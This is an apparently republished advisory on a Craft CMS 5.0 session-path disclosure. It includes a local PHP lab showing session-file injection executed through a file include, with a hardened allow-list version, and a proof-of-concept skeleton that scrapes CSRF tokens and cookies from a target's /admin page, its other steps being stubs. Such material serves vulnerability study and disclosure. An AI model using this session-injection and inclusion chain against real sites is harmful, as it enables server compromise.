Craft CMS 5.0 introduced a security vulnerability involving the exposure of the absolute file path where authentication session data is stored on the server. This "session path exposure" means that certain error messages or specific scenarios can inadvertently reveal sensitive server configuration details.
While this is not a direct remote code execution, the information disclosure still matters. The leaked path tells an attacker exactly where on the file system the session files live, which removes the guesswork from follow-on attacks such as local file inclusion (LFI) attempts and other reconnaissance. On its own the path gives no execution primitive; its value lies in pairing it with a separate flaw that reads or includes server files. The Craft CMS team addressed the issue promptly; users are strongly advised to update to Craft CMS 5.0.1 or a later version to close this hole.
=============================================================================================================================================
| # Title : Craft CMS 5.0 Authentication Session Path Exposure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================
[+] Description
A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
mechanism.
While this does not immediately lead to command execution, it lets the attacker identify the precise location of the session files,
which may be used in a subsequent Session Injection -> Local File Inclusion (LFI) exploit chain: attacker-controlled data is first written into
a session file at the now-known path, and a separate file inclusion flaw then includes that file so the PHP inside it runs.
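The chain named above, as an added local lab that is not Craft CMS code and not part of the PoC in this advisory: attacker-controlled data is written into a PHP session file at a predictable path, and a caller-controlled include then executes the PHP tags inside it. The temporary save path, the session id, the `renderVulnerable` and `renderHardened` functions and the "home" template are all constructed for the demo; nothing here touches a Craft install.

```php
<?php
// Added example, not Craft CMS code and not the advisory's PoC: a local lab
// showing why a leaked session.save_path matters. It models the chain from the
// description: attacker-controlled data lands in a PHP session file at a
// predictable path, and a separate local file inclusion (LFI) primitive includes
// that file, executing the PHP tags inside it. The save path, the session id and
// both include functions are constructed for the demo. Requires PHP 7.4+ CLI.

$savePath = sys_get_temp_dir() . '/sess_lab_' . bin2hex(random_bytes(4));
mkdir($savePath, 0700);
ini_set('session.save_path', $savePath);
ini_set('session.serialize_handler', 'php');  // default handler; file layout assumed below
ini_set('session.use_cookies', '0');          // CLI run: no cookie handling needed

// Step 1: the application stores an attacker-supplied string in $_SESSION.
// PHP writes it verbatim (inside its serialized form) into the session file.
$sid = '0123456789abcdef0123456789abcdef';    // constructed session id
session_id($sid);
session_start();
$_SESSION['username'] = '<?php echo "PAYLOAD_OK"; ?>';
session_write_close();

// Step 2: once session.save_path is known, the file name is deterministic:
// <save_path>/sess_<session id>. This is the only piece the leak contributes.
$sessionFile = $savePath . '/sess_' . $sid;

// Step 3a: vulnerable include that trusts a caller-supplied path (the LFI).
function renderVulnerable(string $page): string
{
    ob_start();
    include $page;          // includes the session file; its PHP tags run
    return ob_get_clean();
}

// Step 3b: hardened form. The caller picks a key from an allow-list of known
// templates; an arbitrary path such as the session file is never reachable.
function renderHardened(string $page, array $allowed): ?string
{
    if (!isset($allowed[$page])) {
        return null;
    }
    ob_start();
    include $allowed[$page];
    return ob_get_clean();
}

$out = renderVulnerable($sessionFile);
echo "session file on disk: " . file_get_contents($sessionFile) . "\n";
echo "vulnerable include ran the payload: "
    . (strpos($out, 'PAYLOAD_OK') !== false ? 'yes' : 'no') . "\n";

$safePage = $savePath . '/home.php';
file_put_contents($safePage, '<p>home</p>');
$allowed = ['home' => $safePage];
var_dump(renderHardened($sessionFile, $allowed));   // NULL: a path is not an allowed key
var_dump(renderHardened('home', $allowed));          // string "<p>home</p>"

// Remove the constructed lab files.
array_map('unlink', glob($savePath . '/*'));
rmdir($savePath);
```

Run it with `php lab.php`. The session file holds `username|s:27:"<?php echo "PAYLOAD_OK"; ?>";`, and `include` treats it like any other PHP source, so the echo runs. Two caveats follow from this. First, the leak only shortens the chain: without a write into the session and an include or read primitive, knowing the path achieves nothing, and common defaults such as `/var/lib/php/sessions` or `/tmp` are guessable anyway. Second, the fix that actually breaks the chain is the hardened form, never including a caller-controlled path; moving session storage elsewhere does not help, since an LFI can reach any readable path.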
[+] References : (https://packetstorm.news/files/id/190728/ CVE-2025-32432)
[+] POC :
save code as poc.php
usage : php poc.php
[+] code
<?php
// PoC skeleton. Only fetchCookiesAndCsrf() talks to the target; the leak,
// injection and include steps are placeholders that describe what a full
// chain would do, as their "[POC ONLY]" strings indicate.
// usage : php poc.php [target-url]   (defaults to https://target.com)
class indoushka
{
    public $targetUrl;
    public $assetId;
    public $sessionId;
    public $csrfToken;
    public $parameterName;
    public $sessionPath;

    public function __construct($url, $assetId = 123)
    {
        $this->targetUrl = rtrim($url, '/');
        $this->assetId = $assetId;
    }

    // Fetch /admin and pull the CSRF token, the first hidden input name and
    // the session cookie out of the response.
    public function fetchCookiesAndCsrf()
    {
        $url = $this->targetUrl . "/admin";
        $html = @file_get_contents($url);
        if ($html === false) return false;
        preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
        $this->csrfToken = $m[1] ?? null;
        preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
        $this->parameterName = $p[1] ?? null;
        // $http_response_header holds every header line of the response, not
        // only the status line, so search all of them for Set-Cookie and keep
        // the first name=value pair that was set.
        $headers = implode("\n", $http_response_header ?? []);
        preg_match_all('/^Set-Cookie:\s*([^;]+)/im', $headers, $c);
        $this->sessionId = $c[1][0] ?? null;
        return [$this->sessionId, $this->csrfToken, $this->parameterName];
    }

    // Placeholder: returns the Debian/Ubuntu default session directory
    // instead of a value obtained from the target.
    public function leakSessionPath()
    {
        return "/var/lib/php/sessions";
    }

    // Placeholder: no request is sent.
    public function injectIntoSession($payload)
    {
        return "[POC ONLY] Session overwritten with payload: {$payload}";
    }

    // Placeholder: no request is sent.
    public function triggerInclude()
    {
        return "[POC] include triggered using assetId=" . $this->assetId;
    }

    public function exploit($payload)
    {
        $this->fetchCookiesAndCsrf();
        $this->sessionPath = $this->leakSessionPath();
        $step1 = $this->injectIntoSession($payload);
        $step2 = $this->triggerInclude();
        return [$step1, $step2];
    }
}

// Instantiate the class defined above; the target URL may be given as the
// first command-line argument.
$module = new indoushka($argv[1] ?? "https://target.com");
$payload = '<?php echo "PAYLOAD_OK"; ?>';
list($s1, $s2) = $module->exploit($payload);
echo $s1 . "\n";
echo $s2 . "\n";
?>
-------------------------------------------------------------------------------------------------------------------------------------------
[+] Output Example:
[POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
[POC] include triggered using assetId=123
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Craft CMS 5.0 Authentication Session Path Exposure
- Written by: khalil shreateh
- Category: Vulnerabilities